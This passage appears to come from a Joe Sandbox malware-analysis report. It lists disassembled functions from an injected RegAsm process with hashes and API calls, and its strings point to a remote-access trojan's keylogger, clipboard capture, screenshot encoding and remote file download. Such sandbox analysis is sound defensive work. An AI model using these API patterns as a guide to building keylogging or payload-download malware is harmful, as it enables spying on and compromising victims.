                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                                                          • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                                                                                          • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                                                          • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                                                          • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                                                                                          • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                                                          • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                                                                                          APIs
                                                                                                                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C2C4
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C2CC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandleOpenProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 39102293-0
                                                                                                                          • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                                                          • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                                                                                          • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                                                          • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                                                                                          APIs
                                                                                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                                                                                            • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                                                                                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                                                                                          • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2633735394-0
                                                                                                                          • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                          • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                                                                                          • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                          • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                                                                                          APIs
                                                                                                                          • GetSystemMetrics.USER32(0000004C,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041942B
                                                                                                                          • GetSystemMetrics.USER32(0000004D,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419431
                                                                                                                          • GetSystemMetrics.USER32(0000004E,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419437
                                                                                                                          • GetSystemMetrics.USER32(0000004F,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041943D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MetricsSystem
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4116985748-0
                                                                                                                          • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                          • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                                                                                          • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                          • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                                                                                          APIs
                                                                                                                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                                                                                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                                                                                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                                                                            • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                                                                                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1761009282-0
                                                                                                                          • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                          • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                                                                                          • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                          • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                                                                                          APIs
                                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorHandling__start
                                                                                                                          • String ID: pow
                                                                                                                          • API String ID: 3213639722-2276729525
                                                                                                                          • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                                          • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                                                                                          • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                                          • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                                                                                          APIs
                                                                                                                          • _free.LIBCMT ref: 1000655C
                                                                                                                            • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                                                                                                            • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                                                            • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                          • String ID: *?$.
                                                                                                                          • API String ID: 2667617558-3972193922
                                                                                                                          • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                          • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                                                          • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                          • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: __alloca_probe_16__freea
                                                                                                                          • String ID: 02x
                                                                                                                          • API String ID: 1635606685-1753518589
                                                                                                                          • Opcode ID: da99ce07a65ee8677d8ac93a591fd61b9625802b74d6fe0f1994a45124a5708e
                                                                                                                          • Instruction ID: d8508cce09ee0c909582ed34c2e37a62d4695ec9c35a5d1c30796301694c113b
                                                                                                                          • Opcode Fuzzy Hash: da99ce07a65ee8677d8ac93a591fd61b9625802b74d6fe0f1994a45124a5708e
                                                                                                                          • Instruction Fuzzy Hash: CC41F671A00611ABFF21AB65CC41A5EB7A4DF45714F15456FF809CB282EB3CD8508799
                                                                                                                          APIs
                                                                                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418AF9
                                                                                                                            • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                                                          • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                                                                                                            • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                                                            • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                          • String ID: image/jpeg
                                                                                                                          • API String ID: 1291196975-3785015651
                                                                                                                          • Opcode ID: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                                                                          • Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
                                                                                                                          • Opcode Fuzzy Hash: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                                                                          • Instruction Fuzzy Hash: B5316D71604300AFC301EF65C884DAFBBE9EF8A304F00496EF985A7251DB7999048BA6
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Init_thread_footer__onexit
                                                                                                                          • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                                          • API String ID: 1881088180-3686566968
                                                                                                                          • Opcode ID: bc6d6fd555eb74fb66702924759b933dd0787dde42f12c75391812bd244e7e16
                                                                                                                          • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                                                                                          • Opcode Fuzzy Hash: bc6d6fd555eb74fb66702924759b933dd0787dde42f12c75391812bd244e7e16
                                                                                                                          • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                                                                                          APIs
                                                                                                                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ACP$OCP
                                                                                                                          • API String ID: 0-711371036
                                                                                                                          • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                                          • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                                                                                          • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                                          • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                                                                                          APIs
                                                                                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BE5
                                                                                                                            • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418C0A
                                                                                                                            • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                                                            • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                          • String ID: image/png
                                                                                                                          • API String ID: 1291196975-2966254431
                                                                                                                          • Opcode ID: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                                                                          • Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
                                                                                                                          • Opcode Fuzzy Hash: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                                                                          • Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
                                                                                                                          APIs
                                                                                                                          • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                          • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                                                                                          Strings
                                                                                                                          • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LocalTime
                                                                                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                          • API String ID: 481472006-1507639952
                                                                                                                          • Opcode ID: 1183f192522e4df64eb5f92206734bd19d1223fd61879706f910d0ae6d0fd28e
                                                                                                                          • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                                                                                          • Opcode Fuzzy Hash: 1183f192522e4df64eb5f92206734bd19d1223fd61879706f910d0ae6d0fd28e
                                                                                                                          • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free
                                                                                                                          • String ID: X3~
                                                                                                                          • API String ID: 269201875-3728252689
                                                                                                                          • Opcode ID: e45424e45f8e51279272ba7adad94846f7910451188f6bcd64545463e3b4dd00
                                                                                                                          • Instruction ID: eb087623ed72b8a9a578691fc23b0733d814cf37bb593ea91099be3de2461304
                                                                                                                          • Opcode Fuzzy Hash: e45424e45f8e51279272ba7adad94846f7910451188f6bcd64545463e3b4dd00
                                                                                                                          • Instruction Fuzzy Hash: 9711E971F102616AF310DB789C81B0A37E5F7526A0F118719F515CB2E4E775D9824681
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNEL32 ref: 0041667B
                                                                                                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: DownloadFileSleep
                                                                                                                          • String ID: !D@
                                                                                                                          • API String ID: 1931167962-604454484
                                                                                                                          • Opcode ID: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                                                                                          • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                                                                                          • Opcode Fuzzy Hash: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                                                                                          • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _strlen
                                                                                                                          • String ID: : $Se.
                                                                                                                          • API String ID: 4218353326-4089948878
                                                                                                                          • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                          • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                          • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                          • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                          APIs
                                                                                                                          • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LocalTime
                                                                                                                          • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                          • API String ID: 481472006-2430845779
                                                                                                                          • Opcode ID: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                                                                          • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                                                                                          • Opcode Fuzzy Hash: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                                                                          • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                                                                                          APIs
                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExistsFilePath
                                                                                                                          • String ID: alarm.wav$hYG
                                                                                                                          • API String ID: 1174141254-2782910960
                                                                                                                          • Opcode ID: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                                                                                          • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                                                                                          • Opcode Fuzzy Hash: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                                                                                          • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                                                                                          • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                          • String ID: Online Keylogger Stopped
                                                                                                                          • API String ID: 1623830855-1496645233
                                                                                                                          • Opcode ID: 58fc78273637d3a7085363245c614971f3a5c921d027ed369f39b2d39b95462a
                                                                                                                          • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
